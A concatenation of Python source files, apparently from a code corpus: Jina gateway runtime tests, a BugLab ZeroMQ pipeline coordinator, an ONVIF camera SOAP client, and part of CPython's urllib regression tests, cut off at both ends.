clientid = doc.text[0:7]
new_doc = Document(text=doc.text + f'-{clientid}-{pod}')
new_docs.append(new_doc)
response_msg.data.docs = new_docs
async def task_wrapper():
import random
await asyncio.sleep(1 / (random.randint(1, 3) * 10))
return response_msg, {}
return asyncio.create_task(task_wrapper())
def create_runtime(
graph_dict: Dict, protocol: str, port_in: int, call_counts=None, monkeypatch=None
):
import json
graph_description = json.dumps(graph_dict)
runtime_cls = None
if call_counts:
def decompress(self):
call_counts.put_nowait('called')
from jina.proto import jina_pb2
self._pb_body = jina_pb2.DataRequestProto()
self._pb_body.ParseFromString(self.buffer)
self.buffer = None
monkeypatch.setattr(
DataRequest,
'_decompress',
decompress,
)
if protocol == 'grpc':
runtime_cls = GRPCGatewayRuntime
elif protocol == 'http':
runtime_cls = HTTPGatewayRuntime
elif protocol == 'websocket':
runtime_cls = WebSocketGatewayRuntime
with runtime_cls(
set_gateway_parser().parse_args(
[
'--port-expose',
f'{port_in}',
'--graph-description',
f'{graph_description}',
'--pods-addresses',
'{}',
]
)
) as runtime:
runtime.run_forever()
def client_send(client_id: int, port_in: int, protocol: str):
from jina.clients import Client
c = Client(protocol=protocol, port=port_in)
# send requests
return c.post(
on='/',
inputs=DocumentArray([Document(text=f'client{client_id}-Request')]),
return_results=True,
)
NUM_PARALLEL_CLIENTS = 10
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_linear(
linear_graph_dict, monkeypatch, protocol
):
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port_in = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port_in, protocol)
assert len(responses) > 0
assert len(responses[0].docs) == 1
assert (
responses[0].docs[0].text
== f'client{client_id}-Request-client{client_id}-pod0-client{client_id}-pod1-client{client_id}-pod2-client{client_id}-pod3'
)
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port_in': port_in,
'graph_dict': linear_graph_dict,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
def test_grpc_gateway_runtime_lazy_request_access(linear_graph_dict, monkeypatch):
call_counts = multiprocessing.Queue()
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyNoDocAccessMockConnectionPool.send_requests_once,
)
port_in = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port_in, 'grpc')
assert len(responses) > 0
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': 'grpc',
'port_in': port_in,
'graph_dict': linear_graph_dict,
'call_counts': call_counts,
'monkeypatch': monkeypatch,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
assert (
_queue_length(call_counts) == NUM_PARALLEL_CLIENTS * 2
) # request should be decompressed at start and end only
for cp in client_processes:
assert cp.exitcode == 0
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_bifurcation(
bifurcation_graph_dict, monkeypatch, protocol
):
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port_in = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port_in, protocol)
assert len(responses) > 0
        # reducing is supposed to happen in the pods; in the test a single doc is returned in non-deterministic order
assert len(responses[0].docs) == 1
assert (
responses[0].docs[0].text
== f'client{client_id}-Request-client{client_id}-pod0-client{client_id}-pod2-client{client_id}-pod3'
or responses[0].docs[0].text
== f'client{client_id}-Request-client{client_id}-pod4-client{client_id}-pod5'
)
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port_in': port_in,
'graph_dict': bifurcation_graph_dict,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_merge_in_gateway(
merge_graph_dict_directly_merge_in_gateway, monkeypatch, protocol
):
# TODO: Test incomplete until merging of responses is ready
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port_in = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port_in, protocol)
assert len(responses) > 0
assert len(responses[0].docs) == 1
pod1_path = (
f'client{client_id}-Request-client{client_id}-pod0-client{client_id}-pod1-client{client_id}-merger'
in responses[0].docs[0].text
)
pod2_path = (
f'client{client_id}-Request-client{client_id}-pod0-client{client_id}-pod2-client{client_id}-merger'
in responses[0].docs[0].text
)
assert pod1_path or pod2_path
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port_in': port_in,
'graph_dict': merge_graph_dict_directly_merge_in_gateway,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_merge_in_last_pod(
merge_graph_dict_directly_merge_in_last_pod, monkeypatch, protocol
):
# TODO: Test incomplete until merging of responses is ready
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port_in = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port_in, protocol)
assert len(responses) > 0
assert len(responses[0].docs) == 1
pod1_path = (
f'client{client_id}-Request-client{client_id}-pod0-client{client_id}-pod1-client{client_id}-merger-client{client_id}-pod_last'
in responses[0].docs[0].text
)
pod2_path = (
f'client{client_id}-Request-client{client_id}-pod0-client{client_id}-pod2-client{client_id}-merger-client{client_id}-pod_last'
in responses[0].docs[0].text
)
assert pod1_path or pod2_path
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port_in': port_in,
'graph_dict': merge_graph_dict_directly_merge_in_last_pod,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_complete_graph_dict(
complete_graph_dict, monkeypatch, protocol
):
# TODO: Test incomplete until merging of responses is ready
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port_in = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port_in, protocol)
assert len(responses) > 0
assert len(responses[0].docs) == 1
# there are 3 incoming paths to merger, it could be any
assert (
f'client{client_id}-Request-client{client_id}-pod0-client{client_id}-pod1-client{client_id}-merger-client{client_id}-pod_last'
== responses[0].docs[0].text
or f'client{client_id}-Request-client{client_id}-pod0-client{client_id}-pod2-client{client_id}-pod3-client{client_id}-merger-client{client_id}-pod_last'
== responses[0].docs[0].text
or f'client{client_id}-Request-client{client_id}-pod4-client{client_id}-pod5-client{client_id}-merger-client{client_id}-pod_last'
== responses[0].docs[0].text
)
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port_in': port_in,
'graph_dict': complete_graph_dict,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
def _queue_length(queue: 'multiprocessing.Queue'):
# Pops elements from the queue and counts them
# Used if the underlying queue is sensitive to ordering
# This is used instead of multiprocessing.Queue.qsize() since it is not supported on MacOS
length = 0
while not queue.empty():
queue.get()
length += 1
return length
|
datageneratingpipeline_coordinator.py
|
import argparse
import logging
import random
from pathlib import Path
from tempfile import NamedTemporaryFile
from threading import Thread
import zmq
from buglab.data.deduplication import DuplicationIndex
from buglab.utils.logging import MetricProvider, configure_logging
LOGGER = logging.getLogger(__name__)
metric_provider = MetricProvider("DataGeneratingPipelineCoordinator")
def data_pipeline_proxy():
# This follows http://zguide.zeromq.org/py:chapter2#The-Dynamic-Discovery-Problem
context = zmq.Context.instance()
    # Socket facing data consumers (SUB sockets connect here)
frontend = context.socket(zmq.XPUB)
frontend.bind("tcp://*:5558")
    # Socket facing data producers (PUB sockets connect here)
backend = context.socket(zmq.XSUB)
backend.bind("tcp://*:5557")
zmq.proxy(frontend, backend)
raise Exception("Should never get here.")
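# Illustrative counterparts (an assumption, not part of this module): data
# producers connect PUB sockets to the XSUB side (tcp://<host>:5557) to publish
# their output, while consumers connect SUB sockets to the XPUB side
# (tcp://<host>:5558) to receive it.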
if __name__ == "__main__":
configure_logging()
parser = argparse.ArgumentParser(description="Orchestrator to extract graphs and publish data.")
parser.add_argument(
"package_list_path",
type=str,
help="the path to a txt file containing the names of the packages to be considered",
)
parser.add_argument(
"--prometheus-server-port",
type=int,
default=8004,
help="The port where Prometheus metrics can be accessed.",
)
parser.add_argument(
"--enable-tracing",
action="store_true",
help="Set to enable recording tracing information.",
)
parser.add_argument(
"--work-distribution-server-port",
type=int,
default=5550,
help="Work distribution port.",
)
args = parser.parse_args()
LOGGER.info("Run args: %s", args)
metric_provider.start_server(args.prometheus_server_port)
metric_provider.set_tracing(args.enable_tracing)
proxy_thread = Thread(target=data_pipeline_proxy, name="data_publishing_proxy", daemon=True)
proxy_thread.start()
    # Keep a dedicated reference so the temporary file is not garbage-collected (and deleted) early.
    tmp_index_file = NamedTemporaryFile()
    duplication_index = DuplicationIndex(Path(tmp_index_file.name))
duplication_server_thread = Thread(target=lambda: duplication_index.server(address="tcp://*:5555"), daemon=True)
duplication_server_thread.start()
all_packages = []
with open(args.package_list_path) as f:
for line in f.readlines():
pkg_name = line.strip()
if len(pkg_name) > 0:
all_packages.append(pkg_name)
package_counter = metric_provider.new_counter("published_packages")
context = zmq.Context.instance()
socket = context.socket(zmq.REP)
socket.bind(f"tcp://*:{args.work_distribution_server_port}")
while True: # Keep publishing forever
random.shuffle(all_packages)
for package in all_packages:
worker_id = socket.recv_string()
LOGGER.info(f"Worker `{worker_id}` asked for the next package to process. Sending `{package}`.")
socket.send_string(package)
package_counter.inc()
duplication_index.clear() # Reset duplication index
        LOGGER.info("All packages have been distributed. Restarting from scratch.")
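    # Illustrative worker side (an assumption, not part of this module): a worker
    # would open a zmq.REQ socket, connect to tcp://<coordinator-host>:5550,
    # send_string() its worker id and recv_string() the next package to process.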
|
client.py
|
__version__ = '0.0.1'
import os.path
import urllib.request, urllib.parse, urllib.error
from urllib.parse import urlparse
from threading import Thread, RLock
import logging
logger = logging.getLogger('onvif')
logging.basicConfig(level=logging.INFO)
logging.getLogger('suds.client').setLevel(logging.CRITICAL)
import suds.sudsobject
from suds.client import Client
from suds.wsse import Security, UsernameToken
from suds.cache import ObjectCache, NoCache
from suds_passworddigest.token import UsernameDigestToken
from suds.bindings import binding
binding.envns = ('SOAP-ENV', 'http://www.w3.org/2003/05/soap-envelope')
from onvif.exceptions import ONVIFError
from onvif.definition import SERVICES, NSMAP
#from suds.sax.date import *
import datetime as dt
# Decorator ensuring that service methods raise an ONVIFError
# when something goes wrong
def safe_func(func):
def wrapped(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as err:
raise ONVIFError(err)
return wrapped
class UsernameDigestTokenDtDiff(UsernameDigestToken):
    '''
    UsernameDigestToken class with an adjustable time offset parameter;
    this allows authentication on cameras that are not time synchronized.
    Please note that using NTP on both ends is the recommended solution;
    this should only be used in "safe" environments.
    '''
def __init__(self, user, passw, dt_diff=None):
# Old Style class ... sigh ...
UsernameDigestToken.__init__(self, user, passw)
self.dt_diff = dt_diff
def setcreated(self, *args, **kwargs):
dt_adjusted = None
if self.dt_diff:
dt_adjusted = (self.dt_diff + dt.datetime.utcnow())
UsernameToken.setcreated(self, dt=dt_adjusted, *args, **kwargs)
self.created = self.created.isoformat()
class ONVIFService(object):
'''
    Python implementation of an ONVIF service.
Services List:
DeviceMgmt DeviceIO Event AnalyticsDevice Display Imaging Media
PTZ Receiver RemoteDiscovery Recording Replay Search Extension
>>> from onvif import ONVIFService
>>> device_service = ONVIFService('http://192.168.0.112/onvif/device_service',
... 'admin', 'foscam',
... '/etc/onvif/wsdl/devicemgmt.wsdl')
>>> ret = device_service.GetHostname()
    >>> print(ret.FromDHCP)
    >>> print(ret.Name)
>>> device_service.SetHostname(dict(Name='newhostname'))
>>> ret = device_service.GetSystemDateAndTime()
    >>> print(ret.DaylightSavings)
    >>> print(ret.TimeZone)
>>> dict_ret = device_service.to_dict(ret)
    >>> print(dict_ret['TimeZone'])
There are two ways to pass parameter to services methods
1. Dict
params = {'Name': 'NewHostName'}
device_service.SetHostname(params)
2. Type Instance
params = device_service.create_type('SetHostname')
params.Hostname = 'NewHostName'
device_service.SetHostname(params)
'''
@safe_func
def __init__(self, addr, user, passwd, url,
cache_location='/tmp/suds', cache_duration=None,
encrypt=True, daemon=False, ws_client=None, no_cache=False, portType=None, dt_diff = None):
if not os.path.isfile(url):
            raise ONVIFError("%s doesn't exist!" % url)
if no_cache:
cache = NoCache()
else:
            # Create cache object
            # NOTE: if cache_location is specified,
            # onvif must have permission to access it.
cache = ObjectCache(location=cache_location)
# cache_duration: cache will expire in `cache_duration` days
if cache_duration is not None:
cache.setduration(days=cache_duration)
# Convert pathname to url
from urllib.parse import urljoin
self.url = urljoin('file:', urllib.request.pathname2url(url))
self.addr = addr
# Create soap client
if not ws_client:
self.ws_client = Client(url=self.url,
location=self.addr,
cache=cache,
port=portType,
headers={'Content-Type': 'application/soap+xml'})
else:
self.ws_client = ws_client
self.ws_client.set_options(location=self.addr)
# Set soap header for authentication
self.user = user
self.passwd = passwd
        # Indicate whether password digest is needed
self.encrypt = encrypt
self.daemon = daemon
self.dt_diff = dt_diff
self.set_wsse()
# Method to create type instance of service method defined in WSDL
self.create_type = self.ws_client.factory.create
@safe_func
def set_wsse(self, user=None, passwd=None):
''' Basic ws-security auth '''
if user:
self.user = user
if passwd:
self.passwd = passwd
security = Security()
if self.encrypt:
token = UsernameDigestTokenDtDiff(self.user, self.passwd, dt_diff=self.dt_diff)
else:
token = UsernameToken(self.user, self.passwd)
token.setnonce()
token.setcreated()
security.tokens.append(token)
self.ws_client.set_options(wsse=security)
@classmethod
@safe_func
def clone(cls, service, *args, **kwargs):
clone_service = service.ws_client.clone()
kwargs['ws_client'] = clone_service
return ONVIFService(*args, **kwargs)
@staticmethod
@safe_func
def to_dict(sudsobject):
# Convert a WSDL Type instance into a dictionary
if sudsobject is None:
return { }
elif isinstance(sudsobject, list):
ret = [ ]
for item in sudsobject:
ret.append(Client.dict(item))
return ret
return Client.dict(sudsobject)
def service_wrapper(self, func):
@safe_func
def wrapped(params=None, callback=None):
def call(params=None, callback=None):
# No params
# print(params.__class__.__mro__)
if params is None:
params = {}
elif isinstance(params, suds.sudsobject.Object):
params = ONVIFService.to_dict(params)
ret = func(**params)
if callable(callback):
callback(ret)
return ret
if self.daemon:
th = Thread(target=call, args=(params, callback))
th.daemon = True
th.start()
else:
return call(params, callback)
return wrapped
def __getattr__(self, name):
        '''
        Call the real ONVIF service operations.
        See the official wsdl definitions for the
        API details (API name, request parameters,
        response parameters, parameter types, etc...)
        '''
builtin = name.startswith('__') and name.endswith('__')
if builtin:
return self.__dict__[name]
else:
return self.service_wrapper(getattr(self.ws_client.service, name))
class ONVIFCamera(object):
    '''
    Python implementation of an ONVIF compliant device.
    This class integrates the ONVIF services.
    The adjust_time parameter allows authentication on cameras that are not time synchronized.
    Please note that using NTP on both ends is the recommended solution;
    this should only be used in "safe" environments.
    Also, this cannot be used on AXIS cameras, as every request is authenticated, contrary to the ONVIF standard.
>>> from onvif import ONVIFCamera
>>> mycam = ONVIFCamera('192.168.0.112', 80, 'admin', '12345')
>>> mycam.devicemgmt.GetServices(False)
>>> media_service = mycam.create_media_service()
>>> ptz_service = mycam.create_ptz_service()
# Get PTZ Configuration:
>>> mycam.ptz.GetConfiguration()
# Another way:
>>> ptz_service.GetConfiguration()
'''
# Class-level variables
services_template = {'devicemgmt': None, 'ptz': None, 'media': None,
'imaging': None, 'events': None, 'analytics': None }
use_services_template = {'devicemgmt': True, 'ptz': True, 'media': True,
'imaging': True, 'events': True, 'analytics': True }
def __init__(self, host, port ,user, passwd, wsdl_dir=None,
cache_location=None, cache_duration=None,
encrypt=True, daemon=False, no_cache=False, adjust_time=False):
        if not wsdl_dir or not os.path.isdir(wsdl_dir):
            wsdl_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "wsdl")
self.host = host
self.port = int(port)
self.user = user
self.passwd = passwd
self.wsdl_dir = wsdl_dir
self.cache_location = cache_location
self.cache_duration = cache_duration
self.encrypt = encrypt
self.daemon = daemon
self.no_cache = no_cache
self.adjust_time = adjust_time
# Active service client container
self.services = { }
self.services_lock = RLock()
# Set addrs
self.update_addrs()
self.to_dict = ONVIFService.to_dict
def update_addrs(self):
# Establish devicemgmt service first
self.dt_diff = None
self.devicemgmt = self.create_devicemgmt_service()
if self.adjust_time :
cdate = self.devicemgmt.GetSystemDateAndTime().UTCDateTime
cam_date = dt.datetime(cdate.Date.Year, cdate.Date.Month, cdate.Date.Day, cdate.Time.Hour, cdate.Time.Minute, cdate.Time.Second)
self.dt_diff = cam_date - dt.datetime.utcnow()
self.devicemgmt.dt_diff = self.dt_diff
self.devicemgmt.set_wsse()
# Get XAddr of services on the device
self.addrs = { }
capabilities = self.devicemgmt.GetCapabilities({'Category': 'All'})
for name, capability in capabilities:
try:
if name.lower() in SERVICES:
ns = SERVICES[name.lower()]['ns']
self.addrs[ns] = capability['XAddr']
except Exception:
                logger.exception('Unexpected service type')
with self.services_lock:
try:
self.event = self.create_events_service()
self.addrs['http://www.onvif.org/ver10/events/wsdl/PullPointSubscription'] = self.event.CreatePullPointSubscription().SubscriptionReference.Address
except:
pass
def update_url(self, host=None, port=None):
changed = False
if host and self.host != host:
changed = True
self.host = host
if port and self.port != port:
changed = True
self.port = port
if not changed:
return
self.devicemgmt = self.create_devicemgmt_service()
self.capabilities = self.devicemgmt.GetCapabilities()
with self.services_lock:
for sname in list(self.services.keys()):
                addr = getattr(self.capabilities, sname.capitalize()).XAddr
self.services[sname].ws_client.set_options(location=addr)
def update_auth(self, user=None, passwd=None):
changed = False
if user and user != self.user:
changed = True
self.user = user
if passwd and passwd != self.passwd:
changed = True
self.passwd = passwd
if not changed:
return
with self.services_lock:
for service in list(self.services.keys()):
self.services[service].set_wsse(user, passwd)
def get_service(self, name, create=True):
service = None
service = getattr(self, name.lower(), None)
if not service and create:
return getattr(self, 'create_%s_service' % name.lower())()
return service
def get_definition(self, name):
'''Returns addr and wsdl of specified service'''
# Check if the service is supported
if name not in SERVICES:
raise ONVIFError('Unknown service %s' % name)
wsdl_file = SERVICES[name]['wsdl']
ns = SERVICES[name]['ns']
wsdlpath = os.path.join(self.wsdl_dir, wsdl_file)
if not os.path.isfile(wsdlpath):
raise ONVIFError('No such file: %s' % wsdlpath)
# XAddr for devicemgmt is fixed:
if name == 'devicemgmt':
addr = 'http://%s:%s/onvif/device_service' % (self.host, self.port)
return addr, wsdlpath
# Get other XAddr
addr = self.addrs.get(ns)
if not addr:
            raise ONVIFError("Device doesn't support service: %s" % name)
return addr, wsdlpath
def create_onvif_service(self, name, from_template=True, portType=None):
'''Create ONVIF service client'''
name = name.lower()
addr, wsdl_file = self.get_definition(name)
with self.services_lock:
svt = self.services_template.get(name)
# Has a template, clone from it. Faster.
if svt and from_template and self.use_services_template.get(name):
service = ONVIFService.clone(svt, addr, self.user,
self.passwd, wsdl_file,
self.cache_location,
self.cache_duration,
self.encrypt,
self.daemon,
no_cache=self.no_cache, portType=portType, dt_diff=self.dt_diff)
            # No template, create a new service from the wsdl document.
            # A little time-consuming.
else:
service = ONVIFService(addr, self.user, self.passwd,
wsdl_file, self.cache_location,
self.cache_duration, self.encrypt,
self.daemon, no_cache=self.no_cache, portType=portType, dt_diff=self.dt_diff)
self.services[name] = service
setattr(self, name, service)
if not self.services_template.get(name):
self.services_template[name] = service
return service
def create_devicemgmt_service(self, from_template=True):
# The entry point for devicemgmt service is fixed.
return self.create_onvif_service('devicemgmt', from_template)
def create_media_service(self, from_template=True):
return self.create_onvif_service('media', from_template)
def create_ptz_service(self, from_template=True):
return self.create_onvif_service('ptz', from_template)
def create_imaging_service(self, from_template=True):
return self.create_onvif_service('imaging', from_template)
def create_deviceio_service(self, from_template=True):
return self.create_onvif_service('deviceio', from_template)
def create_events_service(self, from_template=True):
return self.create_onvif_service('events', from_template)
def create_analytics_service(self, from_template=True):
return self.create_onvif_service('analytics', from_template)
def create_recording_service(self, from_template=True):
return self.create_onvif_service('recording', from_template)
def create_search_service(self, from_template=True):
return self.create_onvif_service('search', from_template)
def create_replay_service(self, from_template=True):
return self.create_onvif_service('replay', from_template)
def create_pullpoint_service(self, from_template=True):
return self.create_onvif_service('pullpoint', from_template, portType='PullPointSubscription')
def create_receiver_service(self, from_template=True):
return self.create_onvif_service('receiver', from_template)
|
test_urllib.py
|
"""Regression tests for urllib"""
import urllib
import httplib
import unittest
from test import test_support
import os
import sys
import mimetools
import tempfile
import StringIO
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
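# For example (illustration only), hexescape(' ') returns '%20' and hexescape('\n') returns '%0A'.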
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
"""Setup of a temp file to use for testing"""
self.text = "test_urllib: %s\n" % self.__class__.__name__
FILE = file(test_support.TESTFN, 'wb')
try:
FILE.write(self.text)
finally:
FILE.close()
self.pathname = test_support.TESTFN
self.returned_obj = urllib.urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(test_support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual('', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
        # Test close() by calling it here and then having it be called again
        # by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), mimetools.Message)
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertEqual(self.returned_obj.getcode(), None)
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison
for line in self.returned_obj.__iter__():
self.assertEqual(line, self.text)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = test_support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in os.environ.keys():
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.getproxies_environment()
        # getproxies_environment uses lowercased, truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
class urlopen_HttpTests(unittest.TestCase):
"""Test urlopen() opening a fake http connection."""
def fakehttp(self, fakedata):
class FakeSocket(StringIO.StringIO):
def sendall(self, str): pass
def makefile(self, mode, name): return self
def read(self, amt=None):
if self.closed: return ''
return StringIO.StringIO.read(self, amt)
def readline(self, length=None):
if self.closed: return ''
return StringIO.StringIO.readline(self, length)
class FakeHTTPConnection(httplib.HTTPConnection):
def connect(self):
self.sock = FakeSocket(fakedata)
assert httplib.HTTP._connection_class == httplib.HTTPConnection
httplib.HTTP._connection_class = FakeHTTPConnection
def unfakehttp(self):
httplib.HTTP._connection_class = httplib.HTTPConnection
def test_read(self):
self.fakehttp('Hello!')
try:
fp = urllib.urlopen("http://python.org/")
self.assertEqual(fp.readline(), 'Hello!')
self.assertEqual(fp.readline(), '')
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments in the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp('Hello!')
try:
fp = urllib.urlopen(url)
self.assertEqual(fp.geturl(), url)
finally:
self.unfakehttp()
def test_read_bogus(self):
# urlopen() should raise IOError for many error codes.
self.fakehttp('''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(IOError, urllib.urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_invalid_redirect(self):
# urlopen() should raise IOError for many error codes.
self.fakehttp("""HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file:README
Connection: close
Content-Type: text/html; charset=iso-8859-1
""")
try:
self.assertRaises(IOError, urllib.urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises IOError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp('')
try:
self.assertRaises(IOError, urllib.urlopen, 'http://something')
finally:
self.unfakehttp()
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
# this only helps to makes sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(test_support.TESTFN)
self.text = 'testing urllib.urlretrieve'
try:
FILE = file(test_support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
return "file://%s" % urllib.pathname2url(os.path.abspath(filePath))
def createNewTempFile(self, data=""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.urlretrieve("file:%s" % test_support.TESTFN)
self.assertEqual(result[0], test_support.TESTFN)
self.assertIsInstance(result[1], mimetools.Message,
"did not get a mimetools.Message instance as "
"second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % test_support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.urlretrieve(self.constructLocalFileUrl(
test_support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = file(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(count, block_size, total_size, count_holder=[0]):
self.assertIsInstance(count, int)
self.assertIsInstance(block_size, int)
self.assertIsInstance(total_size, int)
self.assertEqual(count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % test_support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.urlretrieve(self.constructLocalFileUrl(test_support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile()
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
